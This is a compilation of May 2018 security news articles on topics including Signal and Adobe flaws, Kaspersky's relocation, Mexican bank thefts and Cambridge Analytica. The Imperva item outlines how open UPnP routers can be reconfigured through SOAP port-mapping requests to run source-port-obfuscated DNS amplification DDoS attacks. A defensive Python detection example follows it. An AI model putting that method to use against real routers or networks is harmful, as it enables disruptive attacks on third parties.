AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
16.5.2018 securityweek  Cyber

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not use privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been several highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016), the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
16.5.2018 securityweek  Hacking

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
16.5.2018 securityweek  Vulnerability

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including a remote code execution flaw that has been exploited in the wild.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

The most serious of the flaws is CVE-2018-4990, which has been exploited in the wild in combination with CVE-2018-8120, a zero-day vulnerability affecting Windows. CVE-2018-8120 was fixed by Microsoft with the May 2018 Patch Tuesday updates.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.

*Updated with information on CVE-2018-4990


Symantec Shares More Information on Internal Investigation
16.5.2018 securityweek IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Kaspersky Lab to Move Core Infrastructure to Switzerland
16.5.2018 securityweek  BigBrothers

Company Will Open Transparency Center in Zurich by 2019; Data From Customers in North America Will be Stored and Processed in Switzerland

As part of its Global Transparency Initiative, Russia-based Kaspersky Lab today announced that it will adjust its infrastructure to move a number of "core processes" from Russia to Switzerland.

The security firm has had problems with the U.S. government. In September 2017, the U.S. Department of Homeland Security (DHS) instructed government departments and agencies to stop using products from the Russia-based firm.

There is no hard evidence that Kaspersky has ever colluded with the Russian government; and the lost U.S. government market is small in global terms. The bigger problem, however, is the knock-on effect that U.S. government criticism has on trust levels in the wider market.

In December 2017, Lithuania banned the use of Kaspersky Lab software within certain critical national industries. In April 2018, Twitter stopped accepting ads from Kaspersky Lab; and now, on May 15, 2018, the Dutch government announced it will phase out Kaspersky Lab anti-virus software 'as a precautionary measure'.

Justice Minister Ferdinand Grapperhaus told the Dutch parliament, “The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis. Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

In December 2017, the UK's National Cyber Security Center published a letter it had sent to government permanent secretaries. It included, "In practical terms, this means that for systems processing information classified SECRET and above, a Russia-based provider should never be used."

Maintaining, or regaining, that trust is what lies behind Kaspersky's Global Transparency Initiative, announced in October 2017.

"The new measures," the firm announced, "comprise the move of data storage and processing for a number of regions, the relocation of software assembly and the opening of the first Transparency Center," which will be in Zurich.

The measures in question include customer data storage and processing for most regions; and software assembly including threat detection updates. Transparency will be provided by making the source code available for review by responsible stakeholders in a dedicated Transparency Center.

The company said that by the end of 2018, its products and threat detection rule databases (AV databases) "will start to be assembled and signed with a digital signature in Switzerland, before being distributed to the endpoints of customers worldwide."

The firm is going further by making plans for its processes and source code to be independently supervised by a qualified third-party. To this end, it is supporting the creation of a new, non-profit organization able to assume this responsibility not just for itself, but for other partners and members who wish to join.

“The third-party organization is a non-profit organization to be established independently for the purpose of producing professional technical reviews of the trustworthiness of the security products of its members (including Kaspersky Lab)," the firm told SecurityWeek.

“Since transparency and trust are becoming universal requirements across the cybersecurity industry, Kaspersky Lab is supporting the creation of a new, non-profit organization to take on this responsibility, not just for the company, but for other partners and members who wish to join. The details of the new organization are currently being discussed and will be shared as soon as they are available.”

Switzerland has been chosen as the site of the Center as much for its symbolic importance as anything else. “We considered several locations for our first Transparency Center, and Switzerland most closely met our criteria as well as our policy of complete neutrality," Kaspersky Lab told SecurityWeek.

"We detect and remediate any malware, regardless of its source or purpose, while Switzerland has a long and famous history of neutrality. We also value Switzerland’s robust approach to data protection legislation.” Notably, Switzerland is one of just a handful of non-EU countries that the EU has recognized as having 'adequate' privacy controls.

Notably, Kaspersky Lab does not link the move specifically to the effects of the U.S. ban, but sees wider issues of global trust emerging. “We are implementing these measures first and foremost in response to the evolving, ultra-connected global landscape and the challenges the cyber-world is currently facing," it said.

"This is not exclusive to Kaspersky Lab, and we believe other organizations will in future also choose to adapt to these trends. Having said that, the overall aim of these measures is transparency, verified and proven, which means that anyone with concerns will now be able to see the integrity and trustworthiness of our solutions.”


Exploiting People Instead of Software: Report Shows Attacker Love for Human Interaction
16.5.2018 securityweek  Exploit

Cybercriminals Continue to Rely on Human Interaction to Conduct Wide Range of Attacks

Cybercriminals have been scaling up people-centered threats, increasingly using social engineering rather than automated exploits even in web attacks, a recent Proofpoint report reveals.

Humans have long been said to be the best exploits in the eyes of cybercriminals, with social engineering becoming the most used attack method years back, when almost all attached documents and URLs in malicious emails required human interaction.

Now, Proofpoint’s The Human Factor 2018 report (PDF) reveals that both cybercriminals and threat actors have found new ways to trick victims into becoming their unwitting accomplices. Email remained the most popular attack vector, while the rise of crypto-currency drove innovations in phishing and cybercrime.

Proofpoint saw attacks that include both large, multimillion-message malicious campaigns distributing malware such as ransomware (the biggest email-borne threat of 2017) and highly targeted assaults orchestrated by state-sponsored groups and financially motivated fraudsters.

“Whether they are broad-based or targeted; whether delivered via email, social media, the web, cloud apps, or other vectors; whether they are motivated by financial gain or national interests, the social engineering tactics used in these attacks work time and time again. Victims clicked malicious links, downloaded unsafe files, installed malware, transferred funds, and disclosed sensitive information at scale,” Proofpoint notes.

Last year, suspiciously registered domains of large enterprises outnumbered brand-registered domains 20 to 1, according to the report. Furthermore, 95% of observed web-based attacks used social engineering to trick users into installing malware, 55% of social media attacks impersonating customer-support accounts targeted customers of financial services companies, and 35% of social media scams using links took users to video streaming and movie download sites.

Dropbox phishing was the top lure for phishing attacks, but click rates for Docusign lures were the highest. Network traffic of coin mining bots jumped almost 90% between September and November, while ransomware and banking Trojans accounted for more than 82% of all malicious email messages. Although used often in email campaigns, Microsoft Office exploits usually came in short bursts.

The largest numbers of email fraud attacks hit education, management consulting, entertainment, and media firms, while construction, manufacturing, and technology were the most phished industries. Manufacturing, healthcare, and technology firms were targeted the most by crimeware.

Although ransomware predominated worldwide, banking Trojans were highly popular in Europe and Japan, accounting for 36% and 37% of all malicious mail in those regions, respectively.

Proofpoint has examined hundreds of thousands of SaaS accounts during risk assessments conducted across industries and says that around 1% of all cloud service credentials have been leaked. Furthermore, the security firm discovered that 25% of all suspicious login attempts to cloud services were successful (24% of all logins to cloud services were suspicious).

Attackers are increasingly using cloud services that users are accustomed to receiving email notifications from to send malicious messages and host malware. While no major cloud service avoided abuse, services such as G Suite and Evernote were used to send phishing emails and malware.

“Most cloud platforms are extensible. Third-party add-ons open up new features, but they also create possibilities for abuse. We found a vulnerability in Google Apps Script, for example, that allowed attackers to send malware through legitimate emails that came from G Suite accounts,” the security researchers report.

Looking at how people behave in response to these threats, Proofpoint discovered that North American employees tended to click at the beginning of the work day, at lunch, and the end of the work day. South America followed a similar pattern, but Australian employees were more likely to click in the morning.

Half of all clicks (52%), however, occurred within one hour of the message being delivered, with 11% of recipients clicking on the malicious URL within the first minute and a quarter within 5 minutes.

Usually focused on high-profile targets, state-sponsored attackers and established cyber criminals switched to targeting smaller targets in 2017.

The North Korea-affiliated Lazarus Group launched multistage attacks against individuals and point-of-sale (POS) infrastructure to steal cryptocurrency and consumer credit card data. The financially motivated FIN7 started targeting individuals within restaurant chains using a new backdoor and malicious macros.

The Cobalt Group used new malware and document exploits in attacks against financial institutions and used anti-sandbox features to make detection more difficult.

The security firm also observed cryptocurrency phishing campaigns and identified sophisticated phishing templates targeting wallets and exchanges, including one attack that used malicious Office documents to install a banking Trojan. As of January, the researchers discovered over 100,000 Bitcoin-related domains, some supposedly registered for nefarious purposes.

“Social engineering is at the heart of most attacks today. It can come through something as simple as a bogus invoice lure in a multimillion message malicious spam campaign. It may appear as an intricate fake chain of emails and out-of-band communications in email fraud. Even web-based attacks—which once depended almost exclusively on exploit kits and drive-by downloads—are now built around social engineering templates. People willingly download bogus software updates or fake anti-malware software,” Proofpoint notes.


New DDoS Attack Method Obfuscates Source Port Data
16.5.2018 securityweek  Attack

Recent distributed denial of service (DDoS) attacks showed evidence of a new method being used to bypass existing defenses by obfuscating source port data, Imperva says.

In addition to commonly encountered amplification methods, the observed attacks used payloads with irregular source port data, a vector that only a few DDoS defenders had considered possible, Imperva claims. The attack method abuses a well-known, unpatched weakness in the UPnP (Universal Plug and Play) protocol.

The UPnP networking protocol allows for device discovery over UDP port 1900, and for device control over an arbitrarily chosen TCP port. Because of that, many Internet of Things devices use the protocol to discover and communicate with one another over the LAN.

However, default settings leaving devices open to remote access, the lack of an authentication mechanism, and UPnP-specific remote code execution vulnerabilities have shown the protocol to pose security risks.

In addition to revealing UPnP related vulnerabilities for nearly two decades, security researchers have also shown how SOAP API calls could be used to remotely reconfigure insecure devices over WAN. SOAP API calls can also be used to remotely execute AddPortMapping commands, which govern port forwarding rules.

While mitigating a SSDP amplification assault on April 11, 2018, Imperva noticed that some of the payloads were arriving from an unexpected source port, and not UDP/1900. The same technique was used in another attack a couple of weeks later.

The investigation into these incidents led to the creation of a “PoC for an UPnP-integrated attack method that could be used to obfuscate source port information for any type of amplification payload,” the security firm says.

To perform DNS amplification attacks using this PoC, one would first have to locate an open UPnP router, which can be done by running a wide-scale scan with SSDP requests using a publicly available online service such as Shodan.

There are over 1.3 million devices that appear in such a search, although not all are vulnerable. Locating an exploitable one is still easy, as scripts can be used to automate the process.

Next, the attacker would need to access the device XML file (rootDesc.xml) via HTTP, which can be done by replacing the ‘Location’ IP with the actual device IP in Shodan.

With the rootDesc.xml file listing all of the available UPnP services and devices, the next step is to modify the device’s port forwarding rules, which can be done via the AddPortMapping command, which is the first on the said list.

“Using the scheme within the file, a SOAP request can be crafted to create a forwarding rule that reroutes all UDP packets sent to port 1337 to an external DNS server (3.3.3.3) via port UDP/53,” Imperva notes.

This works because, although port forwarding should only be used for mapping traffic from external IPs to internal IPs and vice versa, most routers don’t verify that a provided internal IP is actually internal, thus allowing requests from one external IP to be proxied to another external IP.

To use this for port-obfuscated DNS amplification, a DNS request issued to the device and received by the UPnP device on port UDP/1337 is proxied to a DNS resolver over destination port UDP/53. The resolver responds to the device over source port UDP/53, and the device forwards the DNS response back to the original requestor after changing the source port back to UDP/1337.

“In an actual attack scenario, however, the initial DNS request would have been issued from a spoofed victim’s IP, meaning that the response would have been bounced back to the victim,” Imperva notes.

The device could be used to launch a DNS amplification DDoS assault with evasive ports, as the payloads would originate from irregular source ports, thus being able to bypass commonplace defenses that identify amplification payloads by looking for source port data. The evasion method can also be used for SSDP and NTP attacks and could work with other amplification vectors as well, including Memcached.

“With source IP and port information no longer serving as reliable filtering factors, the most likely answer is to perform deep packet inspection (DPI) to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment,” Imperva notes.
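The contrast Imperva draws, a source-port filter that the UPnP port mapping defeats versus a payload-level (DPI) check that still recognizes the amplification response, as an added example that is not Imperva's code. All packets are constructed sample data, the thresholds (512 bytes, 8 records) are illustrative assumptions, and the check only decodes the fixed DNS header rather than full records.

```python
"""
Added example (not Imperva's code): a minimal deep-packet-inspection check that
classifies a UDP datagram as a DNS amplification response from its payload alone,
next to the naive source-port filter that the UPnP port-forwarding trick evades.
"""
import struct
from dataclasses import dataclass

AMPLIFICATION_PORTS = {53, 123, 1900, 11211}   # DNS, NTP, SSDP, Memcached reflectors


@dataclass
class UdpDatagram:
    src_ip: str
    src_port: int
    dst_port: int
    payload: bytes


def source_port_filter(pkt: UdpDatagram) -> bool:
    """Naive defense: flag traffic only when the UDP source port is a known reflector port."""
    return pkt.src_port in AMPLIFICATION_PORTS


def parse_dns_header(payload: bytes):
    """Decode the fixed 12-byte DNS header (RFC 1035); return None if the payload is too short."""
    if len(payload) < 12:
        return None
    txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),       # QR=1 means this is a response
        "opcode": (flags >> 11) & 0xF,    # 0 = standard query
        "qdcount": qdcount,
        "ancount": ancount,
        "nscount": nscount,
        "arcount": arcount,
    }


def is_dns_amplification_payload(payload: bytes, min_bytes: int = 512, min_records: int = 8) -> bool:
    """DPI heuristic: a standard-query *response* that is both large and record-heavy.
    The UDP source port is deliberately never consulted (thresholds are assumed values)."""
    hdr = parse_dns_header(payload)
    if hdr is None or not hdr["qr"] or hdr["opcode"] != 0:
        return False
    records = hdr["ancount"] + hdr["nscount"] + hdr["arcount"]
    return len(payload) >= min_bytes and records >= min_records


def dpi_filter(pkt: UdpDatagram) -> bool:
    """Port-agnostic defense: classify by payload content only."""
    return is_dns_amplification_payload(pkt.payload)


def encode_qname(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def build_dns_response(qname: str, n_answers: int, txid: int = 0x1337) -> bytes:
    """Constructed DNS response: one A question plus n_answers A records, each using
    a compression pointer (0xC00C) back to the question name. 45 bytes for one answer."""
    flags = 0x8180                                   # QR=1, RD=1, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", txid, flags, 1, n_answers, 0, 0)
    question = encode_qname(qname) + struct.pack("!HH", 1, 1)   # type A, class IN
    answers = b""
    for i in range(n_answers):
        rdata = bytes([203, 0, 113, i % 256])        # addresses in TEST-NET-3
        answers += struct.pack("!HHHIH", 0xC00C, 1, 1, 300, 4) + rdata
    return header + question + answers


def classify(packets):
    """Return (name, flagged_by_port_filter, flagged_by_dpi) for each named packet."""
    return [(name, source_port_filter(p), dpi_filter(p)) for name, p in packets]


# Constructed traffic; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_PACKETS = [
    # Normal-sized answer from a resolver: the port filter reacts to port 53 alone, DPI does not.
    ("legit small reply", UdpDatagram("198.51.100.53", 53, 40001, build_dns_response("example.com", 1))),
    # Bloated reply from port 53: the classic amplification shape, both filters flag it.
    ("amplified, src 53", UdpDatagram("198.51.100.53", 53, 40002, build_dns_response("example.com", 40))),
    # Same bloated reply bounced through a UPnP port mapping so it arrives from UDP/1337:
    # the port filter misses it, DPI still recognizes it.
    ("amplified, src 1337", UdpDatagram("203.0.113.7", 1337, 40003, build_dns_response("example.com", 40))),
    # Non-DNS text payload from an odd port: DPI must not misfire on it.
    ("ssdp-like text", UdpDatagram("203.0.113.7", 1337, 40004, b"HTTP/1.1 200 OK\r\nST: upnp:rootdevice\r\n\r\n")),
]

if __name__ == "__main__":
    for name, by_port, by_dpi in classify(SAMPLE_PACKETS):
        print(f"{name:20s} port-filter={by_port!s:5s} dpi={by_dpi}")
```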


Signal Flaw Allowed Code Execution With No User Interaction
16.5.2018 securityweek  Vulnerability

An update released over the weekend for the desktop version of the privacy-focused communications app Signal patches a critical vulnerability that could have been exploited for remote code execution with no user interaction required.

Several researchers were looking at an unrelated cross-site scripting (XSS) vulnerability when they noticed that the XSS payload was triggered in the Signal desktop application.

The white hat hackers discovered that they could execute arbitrary code in the app simply by sending a specially crafted message containing specific HTML elements to the targeted user.

“The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources,” the researchers explained in an advisory.

They created proof-of-concept (PoC) payloads that could be used to crash Signal, obtain data from the targeted device’s /etc/passwd file, execute a remote JavaScript file, display a message in an iframe, play audio and video files, display a phishing page, and exfiltrate conversations.

“The critical thing here was that it didn’t require any interaction from the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action,” Iván Ariel Barrera Oro, one of the researchers involved in finding the vulnerability, wrote in a blog post.

The vulnerability affects versions 1.7.1, 1.8.0, 1.9.0 and 1.10.0 on Windows, Linux and likely macOS. Signal developers patched the issue within a couple of hours with the release of version 1.10.1 on Saturday.

Based on an analysis of the source code, researchers determined that the flaw had been previously patched but the fix was removed – likely by accident – with a change made on April 10.


Serbia Arrests FBI-sought Cybercrime Suspect
16.5.2018 securityweek  BigBrothers

Serbian police said Wednesday they had arrested a man sought by the FBI under suspicion of being part of a group of cybercriminals who called themselves "The Dark Overlord".

The arrest of the 38-year-old Serbian from Belgrade, identified only by his initials S.S., was carried out as part of an "international operation conducted by the FBI," a police statement said.

The goal was to identify and arrest hackers who used the name "The Dark Overlord" and had been committing cyberattacks since June 2016, the statement added.

Members of the group were "stealing information and personal data from US citizens, including property and intellectual property data, sensitive health insurance and medical treatment data," it said.

At least 50 people were victims of attacks, the investigation found.

Police said the arrested man is accused of "illegal access to protected computers, computer networks and extortion".

In late April, a British and Dutch-led operation brought down a website linked to more than four million cyberattacks around the world, with banking giants among the victims.

Two people, suspected of being administrators of the webstresser(.)org website were arrested in Serbia at the time.


Some Firefox Screenshots End Up Publicly Accessible
16.5.2018 securityweek  Security

Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

This allows users to save a screenshot of the entire page, of the visible section of the page, or use a selection tool to save only a region they consider important. Next, they can dismiss the action, copy the screenshot, download it, or click a “Save” button that sends the screenshot to the cloud.

All saved screenshots go to https://screenshots.firefox.com, a default setting in the browser. Furthermore, all screenshots that have been previously shared to public forums are indexed by search engines such as Google and could be discovered and accessed by anyone.

Screenshots are sent to the public server only when the user clicks the “Save” button. Many users, however, might have been long doing so without realizing that they were actually sending them to the cloud.

Mozilla issued a fix for the issue yesterday, soon after details on it emerged on Twitter. Apparently, this is not the first time the organization has attempted to address this, but the previous implementation was flawed.

Specifically, in its attempt to avoid shot pages being indexed by search engines, Mozilla replaced robots.txt with <meta name=robots value=noindex>, but the fix was “only put in place for expired pages instead of all pages as intended.”

“So this is being deployed and now we're talking to DDG/Google etc to strip the domains,” John Gruen, UX-focused Product Manager at Mozilla, told the ethical hacker who discovered the flaw.

Updated: A previous version of this article incorrectly stated that all screenshots end up being publicly accessible.


Cambridge Analytica Shared Data With Russia: Whistleblower
16.5.2018 securityweek  BigBrothers

Political consulting group Cambridge Analytica used Russian researchers and shared data with companies linked to Russian intelligence, a whistleblower told a congressional hearing on interference in the 2016 US election Wednesday.

Christopher Wylie, who leaked information on the British-based firm's hijacking of data on millions of Facebook users, told a Senate panel he believes Russian intelligence services had access to data harvested by the consultancy.

Wylie told the panel that Russian-American researcher Aleksandr Kogan, who created an application to harvest Facebook user profile data, was working at the same time on Russian-funded projects, including "behavioral research."

"This means that in addition to Facebook data being accessed in Russia, there are reasonable grounds to suspect that CA may have been an intelligence target of Russian security services...(and) that Russian security services may have been notified of the existence of CA's Facebook data," Wylie said in his written testimony.

Wylie added that Cambridge Analytica "used Russian researchers to gather its data, (and) openly shared information on 'rumor campaigns' and 'attitudinal inoculation'" with companies and executives linked to the Russian intelligence agency FSB.

The hearing is part of a broad inquiry on both sides of the Atlantic over the misuse of Facebook data by the consulting firm working on Donald Trump's 2016 campaign.

Facebook has accused Cambridge Analytica of misappropriating its user data by violating terms of the data agreement with Kogan, the academic researcher.

On Tuesday, the New York Times reported that the FBI and Justice are investigating Cambridge Analytica for potential criminal violations.

The Times said it was unclear whether the probe was linked to the one led by Special Counsel Robert Mueller, who is investigating whether the Trump campaign colluded with Russia.

'Black ops' at CA

Wylie told the panel that "the ethos of the firm was 'anything goes'" for its political campaigns, including "attempting to divert health ministry funds in a struggling African country to support a politician's re-election campaign."

He added that he was aware of "black ops" at the company, "which I understood to include using hackers to break into computer systems to acquire kompromat or other intelligence for its clients."

He said that one of the tactics used to interfere with voter participation included "weaponizing fear."

"In one country, CA produced videos intended to suppress turnout by showing voters sadistic images of victims being burned alive, undergoing forced amputations with machetes and having their throats cut in a ditch," he said.

"These videos also conveyed Islamophobic messages. It was created with a clear intent to intimidate certain communities, catalyze religious hatred, portray Muslims as terrorists and deny certain voters of their democratic rights."

Cambridge Analytica announced earlier this month it was shutting down, unable to recover from the Facebook-linked scandal.

Its chief executive Alexander Nix was suspended after he was filmed by undercover reporters bragging about ways to win political campaigns, including through blackmail and honey traps.

Another whistleblower said that Britons' personal data may have been misused by a pro-Brexit campaign ahead of the 2016 referendum in which Britain voted to leave the European Union.


Auth0 Secures $55 Million in New Funding Round
16.5.2018 securityweek  Safety

Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.

To date, the Bellevue, Wash.-based identity management and authentication company has secured more than $110 million in financing. The firm offers a Universal Identity Platform for web, mobile, IoT, and internal applications and authenticates and secures more than 1.5 billion logins per month.

As part of the new financing round, the firm received investment from World Innovation Lab and existing investors Bessemer Venture Partners, Trinity Ventures, Meritech Capital, and K9 Ventures.

Auth0 plans on using the funds to continue innovation of its Universal Identity Platform, which the company says is used by companies such as VMware, AMD, Mazda, NVIDIA, News Corp, and thousands of others.

Founded in 2013, the company says it managed to double its overall customers and registered more than 100 percent revenue growth last year. This allowed it to hire 140 new employees and open additional offices in London, Sydney, and Tokyo.

“We are humbled by the support from our investors, and emboldened in our mission to provide the most extensible, powerful, and easy-to-use identity management solution available. We look forward to using these funds to make our product and company even better, and to continue offering value to our incredible customers around the world,” said Eugenio Pace, CEO and Co-founder of Auth0.

Last week, Auth0 announced it has joined the Decentralized Identity Foundation (DIF), an initiative from Microsoft, uPort, Gem, Evernym, Blockstack, and Tierion, focused on creating a standards-based ecosystem for managing digital identities. Together with IBM, Accenture, RSA, IDEO, and others, Auth0 will work on creating the specifications for securing and accessing identity data.

“Digital identity is the core of every interaction, transaction, and communication online, but it’s a little like the Wild West right now in terms of standards and specifications around how identity could be handled in a decentralized manner. There is an important need for strong voices to shape the future of this industry, and we are looking forward to our involvement with the Decentralized Identity Foundation,” Martin Gontovnikas, Vice President of Marketing at Auth0, said.


Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
16.5.2018 securityaffairs BigBrothers

According to The Guardian newspaper, Ecuador spent millions on spy operation for Julian Assange after he hacked the embassy network.
According to a report published by the Guardian, Ecuador spied on WikiLeaks founder Julian Assange at its London embassy, where he has lived under political asylum since 2012.

In 2012 a British judge ruled he should be extradited to Sweden to face allegations of sexual assault there, but Assange explained that they were political accusations.

“Ecuador bankrolled a multimillion-dollar spy operation to protect and support Julian Assange in its central London embassy, employing an international security company and undercover agents to monitor his visitors, embassy staff and even the British police, according to documents seen by the Guardian.” reads the report published by The Guardian.

“Over more than five years, Ecuador put at least $5m (£3.7m) into a secret intelligence budget that protected the WikiLeaks founder while he had visits from Nigel Farage, members of European nationalist groups and individuals linked to the Kremlin.”

The newspaper revealed Ecuador spent $5.0 million on the operation, codenamed “Operation Guest” and later “Operation Hotel”, which was approved by the then Ecuadorian president, Rafael Correa, and the then foreign minister, Ricardo Patiño.

